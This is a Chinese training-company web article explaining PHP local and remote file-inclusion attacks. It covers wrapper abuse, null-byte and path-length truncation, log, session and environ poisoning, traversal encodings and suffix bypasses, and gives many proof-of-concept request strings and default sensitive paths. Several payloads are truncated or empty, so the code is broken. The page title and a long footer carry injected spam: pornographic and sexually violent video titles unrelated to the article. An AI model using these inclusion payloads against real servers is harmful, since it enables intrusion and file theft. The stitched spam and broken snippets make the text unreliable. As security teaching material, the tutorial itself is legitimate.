久久伊人一区二区三区四区-久久伊人影视-久久伊人影院-久久伊人中文字幕-亚洲成在人色婷婷-亚洲大成色www永久网

千鋒教育-做有情懷、有良心、有品質的職業教育機構

手機站
千鋒教育

千鋒學習站 | 隨時隨地免費學

千鋒教育

掃一掃進入千鋒手機站

領取全套視頻
千鋒教育

關注千鋒學習站小程序
隨時隨地免費學習課程

當前位置:首頁  >  技術干貨  > 文件包含漏洞相關知識總結

文件包含漏洞相關知識總結

來源:千鋒教育
發布人:qyf
時間: 2022-08-12 15:04:04 1660287844

文件包含漏洞相關知識總結

  1.文件包含漏洞概念

  通過PHP函數引入文件時,傳入的文件名沒有經過合理的驗證,從而操作了預想之外的文件,就可能導致意外的文件泄漏甚至惡意代碼注入

  2.文件包含漏洞的環境要求

  allow_url_fopen=On(默認為On) 規定是否允許從遠程服務器或者網站檢索數據 allow_url_include=On(php5.2之后默認為Off) 規定是否允許include/require遠程文件

  3.常見文件包含函數

  include()和require()區別

  include在引入不存文件時產生一個警告且腳本還會繼續執行,require則會導致一個致命性錯誤且腳本停止執行

  新建include.php文件

<?php

  $a='phpinfo1.php';#包含不存在的文件

  include $a;

  #require $a;

  echo "123";

  ?>

  運行結果:require包含不會顯示123

圖片1

  require_once和include_once該文件中已經被包含過,則不會再次包含

  4.PHP偽協議在文件包含漏洞中的利用

  4.1. php://input

  php://input可以訪問請求的原始數據的只讀流,將post請求的數據當作php代碼執行

  如果存在文件包含漏洞,可將php://input作為文件名傳入,同時在post中注入設置想要注入的代碼,php執行時就會將post的內容作為php代碼執行

  4.1.1. 使用條件

  allow_url_fopen:off/on

  allow_url_include:on

  4.1.2. 實例

<meta charset="utf8">
<?php

  error_reporting(0);

  $file=$_GET["file"];

  if(stristr($file,"php://filter")||stristr($file,"zip://")||stristr($file,"phar://")||stristr($file,"data:")){

  exit('hacker!');

  }

  if($file){

  if($file!="http://www.baidu.com")echo"tips:flag在當前目錄的某個文件中";

  include($file);

  }else{

  echo'click go baidu';

  }

  ?>

  error_reporting(0);

  $file=$_GET["file"];

  if(stristr($file,"php://filter")||stristr($file,"zip://")||stristr($file,"phar://")||stristr($file,"data:")){

  exit('hacker!');

  }

  if($file){

  if($file!="http://www.baidu.com")echo"tips:flag在當前目錄的某個文件中";

  include($file);

  }else{

  echo'click go baidu';

  }

  ?>

  執行任意代碼poc:

  ?file=php://input

  post數據:

  寫入木馬poc:

  ?file=php://input

  post數據:

  ');?>

  讀取目錄結構poc:

  ?file=php://inputpost數據:

  post數據:

  4.2. data://

  4.2.1. poc

  data://[][;charset=][;base64],

  ?file=data://,

  ?file=data://text//plain,

  ?file=data://text/plain;base64,xxxxxxxxx

  ?file=data:text/plain,

  ?file=data:text/plain;base64,xxxxxxxxxx

  4.2.2.file://,zip://,compress.zlib://和bzip2://

  4.3 使用條件

  allow_url_fopen:off/on

  allow_url_include:off/on

  file://用于訪問本地文件系統,在CTF中通常用來讀取本地文件的且不受allow_url_fopen與allow_url_include的影響(相同類型的還有zip://,zlib://和bzip2://)

  file://必須是絕對路徑

  4.3.2. poc

  以zip://為例

  要用#分隔壓縮包和壓縮包里的內容,并且#要用url編碼%23

  %23code.txt

  先將要執行的PHP代碼寫好文件名為code.txt,將phpcode.txt進行zip壓縮,壓縮文件名為file.zip,如果可以上傳zip文件便直接上傳,若不能便將file.zip重命名為file.jpg后在上傳,其他幾種壓縮格式也可以這樣操作。

  4.4. phar://

  4.4.1. poc

  phar://...(當前腳本的絕對路徑).../1.zip/1.php

  4.5. php://filter

  php://filter可以獲取指定文件源碼。當它與包含函數結合時,php://filter流會被當作php文件行。所以我們一般對其進行編碼,讓其不執行。從而導致任意文件讀取。

  poc:

  ?file=php://filter/resource=xxx.php

  或

  ?file=php://filter/read=convert.base64-encode/resource=xxx.php

  或

  ?file=php://filter/convert.base64-encode/resource=xxx.php #可繞過過濾了操作名read的waf

  或

  ?file=php://filter/read=convert.base64-encode/resource=xxx.php #可用重寫resource繞過正則為"/resource=*.jpg/i"的waf

  4.6. 總結

  php://input和data://可以注入任意代碼;file://,zip://,zlib://,bzip2://,phar,php://filter可用于讀取文件,可以結合文件上傳漏洞進行利用。

  5.文件包含漏洞的截斷

  5.1. %00截斷

  5.1.1. 要求

  php版本小于5.3.4

  magic_quotes_gpc為off狀態

  magic_quotes_gpc為on狀態時%00前會被自動加上一個反斜杠轉義

  5.1.2. 實例

  index.php

  if(empty($_GET["file"])){

  echo('../flag.php');

  return;

  }

  else{

  $filename='pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome.txt").'.html';//限制了只能訪問.html后綴名的文件,如果想訪問.php后綴名的文件就需要截斷后面的.html

  include $filename;

  }

  ?>

  poc

  index.php?file=../../flag.php%00

  5.2. 路徑長度截斷

  5.2.1. 要求

  php版本小于5.2.8

  5.2.2. 操作系統文件長度限制

  windows 259個bytes

  linux 4096個bytes

  5.2.3. 實例

  index.php

  

  if(empty($_GET["file"])){

  echo('../flag.php');

  return;

  }

  else{

  $filename='pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome.txt").'.html';//限制了只能訪問.html后綴名的文件,如果想訪問.php后綴名的文件就需要階段后面的.html

  include $filename;

  }

  ?>

  5.2.4. poc

  windows:

  poc1:file=../../flag.php..............................................................................................................................................................................................................................................

  poc2:file=../../flag.php./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

  5.3.總結

  一般來說如果php版本在5.3.4以下,先嘗試使用%00截斷,如果不行再使用路徑長度截斷

  6.包含Apache日志文件

  WEB服務器一般會將用戶的訪問記錄保存在訪問日志中。那么我們可以根據日志記錄的內容,精心構造請求,把PHP代碼插入到日志文件中,通過文件包含漏洞來執行日志中的PHP代碼。

  6.1. 使用條件

  對日志文件可讀

  知道日志文件存儲目錄

  curl命令行url請求工具(避免url轉碼的存在)

  6.2. 獲取日志存放路徑

  日志默認路徑

  (1) apache+Linux日志默認路徑

  /etc/httpd/logs/access_log

  /var/log/httpd/access_log

  (2) apache+win2003日志默認路徑

  D:\xampp\apache\logs\access.log

  D:\xampp\apache\logs\error.log

  (3) IIS6.0+win2003默認日志文件

  C:\WINDOWS\system32\Logfiles

  (4) IIS7.0+win2003 默認日志文件

  %SystemDrive%\inetpub\logs\LogFiles

  (5) nginx 日志文件

  日志文件在用戶安裝目錄logs目錄下

  以我的安裝路徑為例/usr/local/nginx,

  那我的日志目錄就是在/usr/local/nginx/logs里

  6.3. 利用方式

  使用瀏覽器訪問特殊字符會被編碼,可以使用curl避免特殊字符被編碼,但是需要注意的是[ ]在curl是特殊符號,需要進行轉義 ,不然curl使用時會報錯

  curl -v "http://xxxxx/file.php?page="?page="

  7.包含SSH log 日志

  7.1. 利用條件

  需要知道ssh-log的位置,且可讀。默認情況下為 /var/log/auth.log

  7.2. 利用方式

  首先使用ssh連接

  ssh ''@remotehost

  然后隨意輸入密碼

  最后結合文件包含漏洞即可利用

  8.包含SESSION

  8.1. 利用條件

  找到Session內的可控變量

  Session文件可讀寫,并且知道存儲路徑

  php的session文件的保存路徑可以在phpinfo的session.save_path看到

  8.2. session常見存儲路徑

  /var/lib/php/sess_PHPSESSID

  /var/lib/php/sess_PHPSESSID

  /tmp/sess_PHPSESSID

  /tmp/sessions/sess_PHPSESSID

  session文件格式:sess_[phpsessid] ,而 phpsessid 在發送的請求的 cookie 字段中可以看到

  9.包含environ

  利用條件:

  php以cgi方式運行,這樣environ才會保持UA頭。

  environ文件存儲位置已知,且environ文件可讀。

  姿勢:

  /proc/self/environ中會保存user-agent頭。如果在user-agent中插入php代碼,則php代碼會被寫入到中。之后再包含它即可。

  10.包含/proc/self/fd/[environreferer]

  apache的錯誤日志可能包含在/proc/self/fd/[envrionreferer],例如/proc/self/fd/2,/proc/self/fd/3,/proc/self/fd/10,可以使用burpsuite的測試器模塊fuzz出該文件結構

  fuzz字典:

  /proc/self/cmdline

  /proc/self/stat

  /proc/self/status

  /proc/self/fd/0

  /proc/self/fd/1

  /proc/self/fd/2

  /proc/self/fd/3

  /proc/self/fd/4

  /proc/self/fd/5

  /proc/self/fd/6

  /proc/self/fd/7

  /proc/self/fd/8

  /proc/self/fd/9

  /proc/self/fd/10

  /proc/self/fd/11

  /proc/self/fd/12

  /proc/self/fd/13

  /proc/self/fd/14

  /proc/self/fd/15

  /proc/self/fd/16

  /proc/self/fd/17

  /proc/self/fd/18

  /proc/self/fd/19

  /proc/self/fd/20

  /proc/self/fd/21

  /proc/self/fd/22

  /proc/self/fd/23

  /proc/self/fd/24

  /proc/self/fd/25

  /proc/self/fd/26

  /proc/self/fd/27

  /proc/self/fd/28

  /proc/self/fd/29

  /proc/self/fd/30

  /proc/self/fd/31

  /proc/self/fd/32

  /proc/self/fd/33

  /proc/self/fd/34

  /proc/self/fd/35

  11.包含臨時文件

  php中上傳文件,會創建臨時文件。在linux下使用/tmp目錄,而在windows下使用c:\winsdows\temp目錄。在臨時文件被刪除之前,利用競爭即可包含該臨時文件。

  由于包含需要知道包含的文件名。一種方法是進行暴力猜解,linux下使用的隨機函數有缺陷,而window下只有65535中不同的文件名,所以這個方法是可行的。

  另一種方法是配合phpinfo頁面的php variables,可以直接獲取到上傳文件的存儲路徑和臨時文件名,直接包含即可。這個方法可以參考LFI With PHPInfo Assistance

  12.其他包含姿勢

  包含stmp日志

  包含xss

  包含上傳文件

  13.文件包含漏洞的繞過方法

  13.1. 特定前綴繞過

  13.1.1. 目錄遍歷

  使用 …/…/ 來返回上一目錄,被稱為目錄遍歷(Path Traversal)。例如 ?file=…/…/phpinfo/phpinfo.php

  13.1.2. 編碼繞過

  服務器端常常會對于…/等做一些過濾,可以用一些編碼來進行繞過。

  服務器端常常會對于…/等做一些過濾,可以用一些編碼來進行繞過。

  1.利用url編碼

  /%2e%2e%2f

  ...

  %2f%2e%2e/

  \%2e%2e%5c

  ...

  %5c%2e%2e\

  2.二次編碼

  /%252e%252e%252f

  /%252e%252e%255c

  13.2. 指定后綴繞過

  13.2.1. query(?)

  [訪問參數] ?file=http://localhost:8081/phpinfo.php?

  [拼接后] ?file=http://localhost:8081/phpinfo.php?.txt

  ?將后面的.txt截斷,web服務器會認為.txt是一個新的參數

  13.2.2. fragment(#)

  [訪問參數] ?file=http://localhost:8081/phpinfo.php%23

  [拼接后] ?file=http://localhost:8081/phpinfo.php#.txt

  13.2.3. zip://

  [訪問參數] ?file=zip://D:\zip.jpg%23phpinfo

  [拼接后] ?file=zip://D:\zip.jpg#phpinfo.txt

  13.2.4. phar://

  [訪問參數] ?file=phar://zip.zip/phpinfo

  [拼接后] ?file=phar://zip.zip/phpinfo.txt

  更多關于“網絡安全培訓”的問題,歡迎咨詢千鋒教育在線名師。千鋒教育多年辦學,課程大綱緊跟企業需求,更科學更嚴謹,每年培養泛IT人才近2萬人。不論你是零基礎還是想提升,都可以找到適合的班型,千鋒教育隨時歡迎你來試聽。

tags:
聲明:本站稿件版權均屬千鋒教育所有,未經許可不得擅自轉載。
10年以上業內強師集結,手把手帶你蛻變精英
請您保持通訊暢通,專屬學習老師24小時內將與您1V1溝通
免費領取
今日已有369人領取成功
劉同學 138****2860 剛剛成功領取
王同學 131****2015 剛剛成功領取
張同學 133****4652 剛剛成功領取
李同學 135****8607 剛剛成功領取
楊同學 132****5667 剛剛成功領取
岳同學 134****6652 剛剛成功領取
梁同學 157****2950 剛剛成功領取
劉同學 189****1015 剛剛成功領取
張同學 155****4678 剛剛成功領取
鄒同學 139****2907 剛剛成功領取
董同學 138****2867 剛剛成功領取
周同學 136****3602 剛剛成功領取
相關推薦HOT
主站蜘蛛池模板: 日本丰满护士爆乳XXXX无遮挡| 欧美极品在线观看| 精品国产AⅤ一区二区三区V视界| 小东西好几天没弄了还能吃吗 | 男人GAY自慰吞精网站| 女人张开腿让男人桶爽的| 国产CHINASEX对白VID| 亚洲AV无码专区国产乱码不卡| 人妻少妇久久中文字幕| 丰满少妇人妻无码| 精品人妻一区二区三区四区在线 | 久久综合给合久久狠狠狠97色| 国产精品青青青高清在线| 亚洲精品无码专区| 成人丝袜激情一区二区| 高清欧美性猛交XXXX黑人猛交| 被多男摁住灌浓精| 伊人久久大香线蕉午夜| 亚洲AV自慰白浆喷水网站少妇 | 他的舌头探进蜜源毛毛虫说说| 妇女AV中文精品字幕XXX| 国产高清在线a视频大全| 高校美女内射含羞草| 丰满人妻无码使劲张开双腿AV| 哦┅┅快┅┅用力啊熟妇| 色婷婷成人综合激情免费视频| 色婷婷亚洲六月婷婷中文字幕| 无码人妻av免费一区二区三区| 无码人妻精品一区二区三区免费看 | 亚洲AV人无码激艳猛片服务器| 成人美女黄网站18禁免费| 亚洲一区二区三区无码影院| 日韩AV影院在线观看| 精品熟女少妇A∨免费久久| 国产成人无码AV| 影音先锋2020色资源网| 成人欧美日韩一区二区三区| 日产精品久久久一区二区| 国产在线孕妇孕交| 欧美黑大粗无码免费视频| Z〇Z〇ZO女人另类Z〇Z○| 少妇人妻偷人精品无码视频| 张柏芝性XXXXXⅩ| 精品人妻无码专区中文字幕| 淑芬二腿间又痒了| 曰本真人性做爰ⅩXX| 人妻少妇AV中文字幕乱码| 差差差不多视频30分钟轮滑| 日韩精品专区在线影院重磅| 玩弄丰满少妇XXXXX| 香蕉97超级碰碰碰视频| 无线乱码A区B区C区| 草莓视频免费观看| 亚洲熟女AV综合网五月| 西方最大但人文艺术| 亚洲国产群交无码AV| 亚洲精品无码专区| 女主被强迫侵犯H文| 久久精品香蕉绿巨人登场| 国产精品亚洲专区无码破解版| 久久精品国产99国产精品导航| 双腿高潮抽搐喷白浆视频| 久久中文字幕无码专区| 中文天堂在线最新版在线WWW| 中国老太卖婬HD播放| 日本乱偷互换人妻中文字幕| 国产精品色内内在线播放| 潮喷大喷水系列无码久久精品| 亚洲精品456在线播放| 免费无码一区二区三区蜜桃大| 欧美一区二区三放荡人妇| 国产妇女馒头高清泬20P多毛| 亚洲AV无码专区亚洲AV| 最新国产精品亚洲 | 天天大片天天看大片| 国产精品青青青高清在线| 日韩精品一区二区三区影院| 国产AⅤ无码专区亚洲AV综合网| 香蕉97超级碰碰碰视频| 岳打开双腿开始配合交换| 国产免费一区二区三区在线观看| 色婷婷亚洲六月婷婷中文字幕| 高潮喷视频在线无码| 狠狠躁夜夜躁人人爽超碰97香蕉 | 成人Α片免费视频在线观看| 拍摄AV现场失控高潮数次| 欧美电影在线观看| 狠狠色狠狠色综合久久| 国产精品一国产精品| 精品卡一卡二卡3卡高清乱码| 日韩内射美女人妻一区二区三区| 制服丝袜AV无码专区完整版| 亚洲中久无码永久在线观看同| 亚洲人亚洲精品成人网站| 小雪尝禁果又粗又大的中国地图 | 国产69久久精品成人看| 成 人 综合 亚洲另类| 中文字幕乱妇无码AV在线| 亚洲A∨国产AV综合AV网站| 无码一区二区三区AⅤ免费麻豆| 午夜无码一区二区三区在线| 小SB是不是想被C了| 国模GOGO大尺度尿喷人体| 成人无码免费一区二区三区| 人妻少妇精品无码专区| А√天堂资源地址在线下载| 精品无人区一线二线三线区别 | 内射老妇女BBWXOGOD| 大荫蒂又大又长又硬又紧| 农里粗汉的共妻嗯啊高H| 亚洲精品无码久久| 亚洲欧美另类在线观看| 艳妇乳肉豪妇荡乳在线观看| 成年美女黄网站色大片免费看| 欧美又粗又长XXXXBBBB疯| 天天大片天天看大片| 忘忧草在线影院WWW神马| 亚洲国产另类久久久精品小说| 男人J放进女人P全黄动态图| 欧美黑人一级二级巨大久久天堂| 日韩AV无码成人网站| 漂亮人妻中文字幕丝袜| 精品一区二区三区不卡少妇av| 漂亮人妻熟睡中被公侵犯中文版| 日日摸夜夜添夜夜添亚洲女人| 宅男噜噜噜66网站在线观看| 天天天天躁天天爱天天碰2018| 玩弄JAPAN白嫩少妇HD小说| 四川丰满少妇被弄到高潮| 人妻少妇精品视中文字幕国语 | 色老头在线一区二区三区| 无码人妻丰满熟妇区毛片18| 久久精品国产亚洲AV香蕉| 幼儿HIPHOP仙踪林的| 日韩人妻不卡一区二区三区| 久久久久国色AV免费观看性色| 久久久久久久精品免费| 亚洲精品无码久久千人斩| 久久精品丝袜高跟鞋| 无码少妇xxxx| 余生请多指教在线观看免费全集| 日本XXXX色视频在线观看免费,| 欧美自拍亚洲综合在线| 色婷婷五月综合激情中文字幕| 国产丰满老熟女重口对白| 人成AAAAA毛天堂片| 亚洲国产另类久久久精品黑人| 欧美猛少妇性ⅩXXX| 婷婷五月综合色视频| 亚洲熟女AV综合网五月| 午夜无码一区二区三区在线 | 国产精品色视频ⅩXXX| 欧美日韩视频在线第一区| 亚洲AⅤ日韩AV无码COM| 色既是空在线观看| 高清欧美性猛交XXXX黑人猛交| 国产精品无码一区二区三区免费| 欧美电影在线观看| 成人无码H动漫在线网站樱花| 欧美乱强伦XXXXXXXXXX| 精品露脸国产偷人在视频| 国产精品内射后入合集| 美女扒开腿让男人桶爽网站| 精品少妇一区二区| 天天摸日日摸狠狠添高潮喷| 女主被强迫侵犯H文| 动漫人物插画动漫人物的视频| 在线观看亚洲一区| 国产亚洲精品第一综合麻豆| 成人无码精品1区2区3区免费看 | 顶级欧美熟妇XXXXX欧美精品| 自慰无码一区二区三区| 国产精品自在拍一区二区不卡| 国产放荡AV剧情演绎麻豆| 小辣椒AV福利在线网站| 成人欧美一区二区三区视频| 国产成人精品久久综合| 国产精品无码专区| 欧美free叉叉叉叉极品少妇| 亚洲VA欧美VA国产VA综合| 丰满人妻一区二区三区视频53| 琪琪秋霞午夜AV影院| 人与畜禽共性关系的重要性| 亚洲AV无码国产精品色午| 丰满的少妇愉情HD高清免费| 久久精品人人做人人爽老司机| 又黄又无遮挡AAAAA毛片| 在线麻豆精东9制片厂AV影现网| 国产精品白丝无码ThePorn| 久久69精品久久久久久HB| 久久精品国产亚洲AV高清色欲| 欧美xxxxx久久短视频| 精品人妻一区二区三区四区在线| 久久天天躁夜夜躁狠狠85| 毛很浓密超多黑毛的少妇 | 中文字幕人妻互换AV久久| 余生请多指教在线观看免费全集| 亚洲国产AV无码专区亚洲AVL| 拔萝卜影视剧免费观看| 秋霞免费理论片在线观看| 久久久久久国产精品MV| 岳女四人共侍一夫婷婷| 女人18片毛片60分钟| 丁香五月天天综合亚洲| 亚洲AV永久无码一区| 漂亮人妻熟睡中被公侵犯中文版| 国产成人无码A区在线观看视频 | 欧美日韩视频在线第一区| 成人性生交大片免费看中文| 欧美电影在线观看| 日韩少妇内射免费播放| Z〇Z〇ZO女人另类Z〇Z○| 国产精品欧美久久久久无广告| 小东西才几天没做喷的到处都是| 成色好的Y31S标准版| 丰满人妻中伦妇伦精品APP| 女人张开腿让男人桶爽的| 少妇99久久黑人| 日韩精品久久久久久久电影蜜臀| 中文字幕久久波多野结衣AV| 苍井空无码免费换线| 被多人玩弄的烂货苏妖精| 亚洲色大成网站WWW永久| 性一交一乱一色一视频| 日本中文字幕乱码免费| 年级老师的滋味4| 国产精品一卡二卡三卡四卡| 差差差无掩盖视频30分钟| 岳的奶大又白又紧| 久久99精品久久久久婷婷| 粉嫩av观看成人网站| 玩弄粉嫩少妇高潮出白浆AⅤ| 欧美丰满熟妇人妻兽交视频| 饭桌上故意张开腿让公在线观看| 亚洲AV无码一区二区高潮 | 亚洲AV永久无码精品无码网站 | 色婷婷粉嫩AV精品综合在线| 欧美人与禽ZOZZO| 中文无码不卡中文字幕| 女儿的朋友5中汉字晋通话| 成人羞羞视频免费网站| 欧美成人精品第一区二区三区| 国产精品一国产精品| 久久久久久久精品2| 无人区码一码二码三码是| 国产对白videos麻豆高潮| 麻花豆传媒剧国产MV在线观看| 成人嘿咻漫画免费入口| 丰满老熟妇好大BBBBB| 国产精品女上位好爽在线 | 无码少妇一区二区三区免费| 国产高清在线观看AV片麻豆| 男人J放进女人P全黄动态图| 无人区码一码二码三码在线| 天堂中文在线最新版| 人妻少妇精品中文字幕av蜜桃| 小诗的公交车日记免费读| 色婷婷婷亚洲综合丁香五月| 日本毛多水多做受视频| 欧美精品色婷婷五月综合| 久久久综合九色综合鬼色| 久久久久久久99精品国产片| 国产精品边做奶水狂喷无码| 波多野结衣AV高清中文| 日韩AV无码成人网站| 国产一本一道久久香蕉| 中国西西大胆女人裸体艺术| 亲子乱AⅤ一区二区三区| 久久久久久九九精品久| 播放灌醉水嫩大学生国内精品 | 成人无码A区在线观看视频| 小拗女一区二区三区| 好男人日本社区WWW| 香蕉免费一区二区三区在| 激情五月丁香六月综合AVXXXX | 国产一区二区三区久久精品| 亚洲无码成人av| 久久久WWW成人免费看片| 小拗女一区二区三区| 疯狂做受XXXX国产| 国产精品VIDEOSSEX久久发布| 余年周婉小说全文免费阅读完整版 | 国产免费观看久久黄AV片| 性欧美丰满熟妇XXXX性久久久| 粉嫩小泬久久久久久久久久小说| 少妇CHINA中国人妻VIDE| 亚洲VA欧美VA国产VA综合| 公交车被CAO得合不拢腿视频| 欧美一区二区三区不卡| 少妇午夜AV一区| 欧洲美熟女乱又伦免费视频| 日韩不卡手机视频在线观看| 人妻无码AⅤ中文字幕日韩| 私密按摩高潮熟女啪啪| 人妻丰满熟妇av无码区HD优 | 亚洲日韩欧洲无码A∨夜夜| 综合无码精品人妻一区二区三区| 粉嫩小泬久久久久久久久久小说| 房东天天吃我奶躁我| 一面亲上边一面膜下边56| 中文人妻熟妇乱又伦精品| 无码人妻av免费一区二区三区| 成年网站未满十八禁在线观看| WWW夜片内射视频日韩精品成人| 国产成人精品久久综合 | 隔壁人妻偷人BD中字| 天天摸天天做天天爽水多| 精品卡一卡二卡3卡高清乱码| 国产裸体XXXX视频在线播放 | 成年轻人电影免费 视频| 挺进绝色老师的紧窄小肉六视频| 精品熟女少妇AV免费观看| 亚洲AV无码无在线观看红杏| 内射人妻视频国内| 有人有在线观看的片资源| 欧美人与ZOZOXXXX视频| 亚洲中文久久精品无码照片| 久久久噜噜噜久噜久久| 欧洲免费无线码在线一区| 小婷又软又嫩又紧水又多| 饭桌上故意张开腿让公在线观看| 熟妇人妻不卡无码一区| 亚洲AV永久中文无码精品综合 | 丰满大屁股BWWBWWBWW| 久久九九精品国产AV片国产| 破了亲妺妺的处免费视频国产| 亚洲中文久久精品无码照片| 第九理论午夜电影院| 高清拍拍拍无挡国产精品| 狠狠色噜噜狠狠亚洲AV| 国产精品导航一区二区| 制服丝袜AV无码专区完整版| 中文字幕亚洲欧美专区| 午夜成人亚洲理论片在线观看| 日韩无码视频三区| 国产国语对白又大又粗又爽| 差差漫画在线观看登录页面弹窗 | 久久AⅤ人妻少妇嫩草影院| 毛片亚洲AV无码精品国产午夜 | 天天做天天躁天天躁| 狂野AV人人澡人人添| 国产成人8X视频网站| 日韩人妻不卡一区二区三区| 国精产品一区一区三区有限在线| 丰满又黄又爽少妇毛片| 男人J放进女人J无遮挡免费看| 国产女人水真多18毛片18精品| 中文无码制服丝袜人妻AV| 久久久综合九色综合鬼色| 产高清在线精品一区二区三区| 小婷又软又嫩又紧水又多| 残忍开嫩苞疼哭了视频| 国产FREEXXXX性麻豆| 久久夜色精品国产噜噜噜亚洲AV | 日韩一区二区三区精品| XXXXFREE少妇过瘾| 成年片色大黄全免费网站久久| 久久久久久精品人妻免费网站| 少妇99久久黑人| 天天做天天躁天天躁| 人妻丰满熟妇AV无码区乱| 女人被躁到高潮嗷嗷叫游戏| 欧美人与性囗牲恔配| 久久九九兔免费精品6| 精品国产一区二区三区2021| 玩弄粉嫩少妇高潮出白浆AⅤ| 亚洲欧美精品午睡沙发| 日韩精品专区在线影院重磅| 女人18片毛片60分钟| 国产精品成人99一区无码| 肥臀浪妇太爽了快点再快点| 调教小SAO货撅起打屁股作文| 人妻精油按摩BD高清中文字幕| 欧美黑人男士和白人美女a级黄片视频在线播放 | 狠狠婷婷色五月中文字幕| 成人欧美激情亚洲日韩蜜臀| 亚洲AV无码乱码国产精品 | 日韩精品无码区免费专区| 久久久久亚洲AV无码网站| 宝贝对着镜子CAO好不好| 欧美亚洲熟妇少妇性A爱| 久久久久久成人毛片免费看| 在线播放亚洲第一字幕| 国产精品久久久久久久9999| 亚洲AV无码国产精品夜色午夜| 精品少妇人妻AV免费久久久| 亚洲AV之男人的天堂| 波多野结衣初尝黑人巨大| 国产免费破外女真实出血视频| 一区三区四区产品乱码| 被多男摁住灌浓精| 国产AⅤ无码专区亚洲AV综合网| 欧洲免费无码视频在线| 亚洲AV无码一区二区三区18| 差差差很疼视频30分钟无掩盖| 国产精品民宅偷窥盗摄| 内射少妇骚B一√| 久久国产精品无码网站| 女人大胆张开荫道口∞| 久久九九精品国产AV片国产 | 麻豆传播媒体2023最新网站| 首页 动漫 亚洲 欧美 日韩 | 精品熟人妻一区二区三区四区不卡 | 国产免费观看久久黄AV片| 公粗挺进了我的密道在线观看| 国产精品成人VA在线播放| 亚洲AV无码一区二区三区国产| 欧美人妻精品一区二区三区| 国产CHINASEX对白VID| 色婷婷亚洲一区二区三区|